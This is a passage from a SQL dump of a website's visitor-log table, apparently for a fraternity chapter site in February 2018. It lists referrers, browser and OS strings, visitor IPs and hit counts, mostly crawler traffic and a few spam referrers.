173.252.115.6','000',3,0),(22951,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.88','000',5,0),(22952,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.197','000',1,0),(22953,'2018-02-18','https://zphiblgz.org','Firefox','Windows','53.0','','184.94.240.92','000',2,0),(22954,'2018-02-18','https://zphiblgz.org','Firefox','Macintosh','57.0','','73.134.159.197','000',9,0),(22955,'2018-02-18','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.167.48','000',1,0),(22956,'2018-02-18','https://zphiblgz.org','Firefox','Windows','40.1','','196.201.105.4','000',2,0),(22957,'2018-02-18','https://zphiblgz.org/','Chrome','Windows','63.0.3239.132','','98.233.170.205','000',1,0),(22958,'2018-02-18','https://zphiblgz.org/scholarship/application/','Chrome','Macintosh','64.0.3282.140','','71.179.100.71','000',1,0),(22959,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.96','000',1,0),(22960,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.161','000',3,0),(22961,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.113','000',3,0),(22962,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.182','000',1,0),(22963,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.142','000',1,0),(22964,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.209','000',1,0),(22965,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.155','000',2,0),(22966,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.134','000',3,0),(22967,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.142','000',1,0),(22968,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.205','000',1,0),(22969,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.210','000',5,0),(22970,'2018-02-18','https://www.google.com/','Safari','iPhone','11.0','','172.58.184.140','000',2,0),(22971,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.16','000',2,0),(22972,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.50','000',1,0),(22973,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.43','000',2,0),(22974,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.27','000',2,0),(22975,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.114','000',1,0),(22976,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.110','000',1,0),(22977,'2018-02-18','https://zphiblgz.org','Chrome','Windows','64.0.3282.167','','71.121.235.128','000',5,0),(22978,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.171','000',2,0),(22979,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.59','000',1,0),(22980,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.232','000',1,0),(22981,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.102','000',3,0),(22982,'2018-02-18','http://online-sbank.ru/','Opera','Windows','9.0','','178.137.16.45','000',3,0),(22983,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.146','000',3,0),(22984,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.252','000',1,0),(22985,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.98','000',3,0),(22986,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.222','000',1,0),(22987,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.211','000',3,0),(22988,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.204','000',3,0),(22989,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.184','000',1,0),(22990,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.196','000',1,0),(22991,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.204','000',2,0),(22992,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.57','000',2,0),(22993,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.92','000',1,0),(22994,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.145','000',1,0),(22995,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.65','000',1,0),(22996,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.40','000',1,0),(22997,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.113','000',2,0),(22998,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.26','000',2,0),(22999,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.116','000',1,0),(23000,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.84','000',3,0),(23001,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.117','000',1,0),(23002,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.24','000',1,0),(23003,'2018-02-18','https://zphiblgz.org','Firefox','Windows','40.1','','189.152.6.186','000',2,0),(23004,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.182','000',2,0),(23005,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.147','000',1,0),(23006,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.154','000',3,0),(23007,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.79.114','000',1,0),(23008,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.143','000',3,0),(23009,'2018-02-18','https://zphiblgz.org/','Firefox','Linux','57.0','','71.208.8.253','000',2,0),(23010,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.206','000',2,0),(23011,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.210','000',3,0),(23012,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.225','000',1,0),(23013,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.177','000',2,0),(23014,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.48','000',3,0),(23015,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.82','000',1,0),(23016,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.213','000',1,0),(23017,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.198','000',2,0),(23018,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.52','000',3,0),(23019,'2018-02-18','https://zphiblgz.org','Firefox','Macintosh','57.0','','192.198.80.227','000',3,0),(23020,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.116','000',1,0),(23021,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.117','000',4,0),(23022,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.219','000',1,0),(23023,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.170','000',3,0),(23024,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.112','000',1,0),(23025,'2018-02-18','https://zphiblgz.org','Safari','Macintosh','8.0','','54.85.182.120','000',2,0),(23026,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.203','000',4,0),(23027,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.59','000',2,0),(23028,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.49','000',2,0),(23029,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.193','000',1,0),(23030,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.205','000',1,0),(23031,'2018-02-18','https://zphiblgz.org','Safari','Macintosh','11.0.1','','108.48.153.144','000',2,0),(23032,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.192','000',2,0),(23033,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.80','000',1,0),(23034,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.23','000',1,0),(23035,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.200','000',2,0),(23036,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.213','000',1,0),(23037,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.67','000',1,0),(23038,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.213','000',2,0),(23039,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.79','000',1,0),(23040,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.80.119','000',1,0),(23041,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.80.117','000',1,0),(23042,'2018-02-18','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',5,0),(23043,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.112','000',2,0),(23044,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.220','000',3,0),(23045,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.116','000',1,0),(23046,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.66','000',2,0),(23047,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.135','000',1,0),(23048,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.174','000',2,0),(23049,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.249','000',1,0),(23050,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.20','000',1,0),(23051,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.8','000',1,0),(23052,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.209','000',1,0),(23053,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.16','000',1,0),(23054,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.39','000',1,0),(23055,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.195','000',2,0),(23056,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.183','000',1,0),(23057,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.199','000',2,0),(23058,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.116','000',1,0),(23059,'2018-02-18','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.32','000',1,0),(23060,'2018-02-18','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.32','000',1,0),(23061,'2018-02-18','https://buynorxx.com/','Opera','Windows','9.01','','178.137.16.45','000',3,0),(23062,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.23','000',3,0),(23063,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.119','000',1,0),(23064,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.207','000',1,0),(23065,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.119','000',1,0),(23066,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.16','000',3,0),(23067,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.58','000',2,0),(23068,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.202','000',1,0),(23069,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.198','000',2,0),(23070,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.151','000',4,0),(23071,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.50','000',2,0),(23072,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.169','000',2,0),(23073,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.212','000',1,0),(23074,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.134','000',2,0),(23075,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.152','000',1,0),(23076,'2018-02-18','https://www.google.com/','Chrome','Windows','64.0.3282.167','','144.96.73.19','000',3,0),(23077,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.203','000',1,0),(23078,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.207','000',2,0),(23079,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.55','000',1,0),(23080,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.212','000',1,0),(23081,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.215','000',1,0),(23082,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.118','000',2,0),(23083,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.117','000',1,0),(23084,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.195','000',2,0),(23085,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.77','000',2,0),(23086,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.26','000',1,0),(23087,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.224','000',3,0),(23088,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.200','000',1,0),(23089,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.73','000',2,0),(23090,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.239','000',5,0),(23091,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.42','000',1,0),(23092,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.188','000',1,0),(23093,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.214','000',2,0),(23094,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.166','000',4,0),(23095,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.149','000',2,0),(23096,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.51','000',1,0),(23097,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.49','000',1,0),(23098,'2018-02-18','https://zphiblgz.org','Firefox','Windows','34.0','','192.187.101.178','000',2,0),(23099,'2018-02-18','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(23100,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.197','000',1,0),(23101,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.207','000',2,0),(23102,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.56','000',1,0),(23103,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.22','000',1,0),(23104,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.64','000',1,0),(23105,'2018-02-18','http://suzuki-metropolis.kiev.ua/','MSIE','Windows','6.0','','46.211.13.134','000',3,0),(23106,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.212','000',1,0),(23107,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.119','000',2,0),(23108,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.224','000',2,0),(23109,'2018-02-18','https://zphiblgz.org','Firefox','Windows','38.0','','54.194.178.94','000',2,0),(23110,'2018-02-18','https://zphiblgz.org','Safari','Linux','9.0','','34.240.28.89','000',4,0),(23111,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.5','000',1,0),(23112,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.1','000',1,0),(23113,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.171','000',2,0),(23114,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.134','000',1,0),(23115,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.201','000',1,0),(23116,'2018-02-18','https://search.yahoo.com/','Chrome','Windows','64.0.3282.167','','96.244.217.25','000',5,0),(23117,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.199','000',2,0),(23118,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.114','000',2,0),(23119,'2018-02-18','https://zphiblgz.org','Firefox','Windows','32.0','','142.4.215.39','000',1,0),(23120,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.226','000',2,0),(23121,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.153','000',1,0),(23122,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.26','000',3,0),(23123,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.42','000',1,0),(23124,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.148','000',1,0),(23125,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.123','000',3,0),(23126,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.30','000',2,0),(23127,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.75','000',1,0),(23128,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.212','000',2,0),(23129,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.166','000',1,0),(23130,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.132','000',3,0),(23131,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.18','000',1,0),(23132,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.186','000',1,0),(23133,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.55','000',1,0),(23134,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.213','000',1,0),(23135,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.116','000',4,0),(23136,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.123','000',1,0),(23137,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.22','000',2,0),(23138,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.5','000',1,0),(23139,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.85','000',1,0),(23140,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.230','000',1,0),(23141,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.235','000',2,0),(23142,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.113','000',1,0),(23143,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.119','000',2,0),(23144,'2018-02-18','https://r.search.yahoo.com/_ylt=AwrBTzfPvYhav8EANWRx.9w4;_ylu=X3oDMTEyNmo4bTliBGNvbG8DYmYxBHBvcwMxBHZ0aWQDQjUyNzdfMQRzZWMDc3I-/RV=2/RE=1518939727/RO=10/RU=https%3a%2f%2fzphiblgz.org%2f/RK=2/RS=Ff1iv26.dHOtEwM1qWi_DFpyO9A-','Safari','iPhone','11.0','','173.69.187.98','000',6,0),(23145,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.86','000',2,0),(23146,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.206','000',2,0),(23147,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.84','000',1,0),(23148,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.186','000',1,0),(23149,'2018-02-18','https://zphiblgz.org','MSIE','Windows','8.0','','74.217.90.250','000',1,0),(23150,'2018-02-18','https://zphiblgz.org','MSIE','Windows','9.0','','74.217.90.250','000',1,0),(23151,'2018-02-18','https://zphiblgz.org','MSIE','Windows','11.0','','74.217.90.250','000',3,0),(23152,'2018-02-18','https://owa.howardcc.edu/owa/redir.aspx?REF=1J4b1_ko32a_eqivgA86sd0TxWaejpQPv3N5u5NX2RIoYlA9qG3VCAFodHRwczovL3pwaGlibGd6Lm9yZy9zY2hvbGFyc2hpcC8.','Safari','iPad','11.0','','71.121.163.58','000',2,0),(23153,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.181','000',1,0),(23154,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.150','000',1,0),(23155,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.99','000',1,0),(23156,'2018-02-18','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.176','000',2,0),(23157,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.14','000',1,0),(23158,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.71','000',2,0),(23159,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.203','000',2,0),(23160,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.201','000',1,0),(23161,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.85','000',1,0),(23162,'2018-02-18','https://www.bing.com/','Edge','Windows','16.16299','','73.129.22.251','000',2,0),(23163,'2018-02-18','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.10.115','000',1,0),(23164,'2018-02-18','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.12.190','000',2,0),(23165,'2018-02-18','http://www.zphibmaryland.org/chapters/','Safari','iPhone','10.0','','166.137.252.60','000',1,0),(23166,'2018-02-18','http://www.zphibmaryland.org/chapters/','Safari','iPhone','10.0','','107.77.225.83','000',4,0),(23167,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.13','000',2,0),(23168,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.116','000',1,0),(23169,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.119','000',2,0),(23170,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.117','000',1,0),(23171,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.178','000',3,0),(23172,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.176','000',2,0),(23173,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.180','000',1,0),(23174,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.130','000',1,0),(23175,'2018-02-18','https://zphiblgz.org/','Firefox','Macintosh','57.0','','189.20.32.90','000',1,0),(23176,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.81','000',5,0),(23177,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.126','000',1,0),(23178,'2018-02-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.91','000',1,0),(23179,'2018-02-19','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.28','000',1,0),(23180,'2018-02-19','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.28','000',1,0),(23181,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.36','000',2,0),(23182,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.76','000',1,0),(23183,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.112','000',1,0),(23184,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.189','000',1,0),(23185,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.134','000',4,0),(23186,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.204','000',2,0),(23187,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.173','000',3,0),(23188,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.114','000',3,0),(23189,'2018-02-19','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.132','','68.134.12.220','000',6,0),(23190,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.215','000',3,0),(23191,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.212','000',1,0),(23192,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.218','000',2,0),(23193,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.111','000',1,0),(23194,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.113','000',1,0),(23195,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.213','000',2,0),(23196,'2018-02-19','https://www.google.com/','Chrome','Macintosh','63.0.3239.132','','65.114.252.79','000',1,0),(23197,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.59','000',2,0),(23198,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.113','000',1,0),(23199,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.57','000',2,0),(23200,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.68','000',1,0),(23201,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.81','000',3,0),(23202,'2018-02-19','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.28','000',1,0),(23203,'2018-02-19','https://zphiblgz.org','Chrome','Windows','14.0.815.10913','','217.147.168.33','000',2,0),(23204,'2018-02-19','https://zphiblgz.org','Chrome','Windows','11.0.661.0','','217.147.168.33','000',1,0),(23205,'2018-02-19','https://zphiblgz.org','Chrome','Linux','14.0.825.0','','217.147.168.33','000',1,0),(23206,'2018-02-19','http://search.yahoo.co.jp/','MSIE','Windows','11.0','','153.150.248.193','000',2,0),(23207,'2018-02-19','http://rangjued.com/','MSIE','Windows','6.0','','46.118.116.121','000',5,0),(23208,'2018-02-19','https://pills24h.com/buy-paroxetine-online-without-prescription/','MSIE','Windows','6.0','','178.137.162.218','000',4,0),(23209,'2018-02-19','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.28','000',1,0),(23210,'2018-02-19','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.28','000',1,0),(23211,'2018-02-19','https://zphiblgz.org','Go--client','Unknown','1.1','','159.203.67.240','000',3,0),(23212,'2018-02-19','https://zphiblgz.org','Go--client','Unknown','1.1','','138.197.72.0','000',2,0),(23213,'2018-02-19','https://zphiblgz.org','Go--client','Unknown','1.1','','174.138.63.96','000',1,0),(23214,'2018-02-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','194.187.170.132','000',1,0),(23215,'2018-02-19','https://zphiblgz.org','Firefox','Windows','40.1','','87.4.63.121','000',2,0),(23216,'2018-02-19','https://zphiblgz.org','Firefox','Macintosh','57.0','','148.251.54.44','000',1,0),(23217,'2018-02-19','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.31','000',1,0),(23218,'2018-02-19','https://r.search.yahoo.com/_ylt=AwrBTzfPvYhav8EANWRx.9w4;_ylu=X3oDMTEyNmo4bTliBGNvbG8DYmYxBHBvcwMxBHZ0aWQDQjUyNzdfMQRzZWMDc3I-/RV=2/RE=1518939727/RO=10/RU=https%3a%2f%2fzphiblgz.org%2f/RK=2/RS=Ff1iv26.dHOtEwM1qWi_DFpyO9A-','Safari','iPhone','11.0','','173.69.187.98','000',2,0),(23219,'2018-02-19','https://zphiblgz.org','Firefox','Windows','40.1','','124.104.44.43','000',2,0),(23220,'2018-02-19','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','107.77.202.72','000',1,0),(23221,'2018-02-19','https://r.search.yahoo.com/_ylt=AwrBTzfPvYhav8EANWRx.9w4;_ylu=X3oDMTEyNmo4bTliBGNvbG8DYmYxBHBvcwMxBHZ0aWQDQjUyNzdfMQRzZWMDc3I-/RV=2/RE=1518939727/RO=10/RU=https%3a%2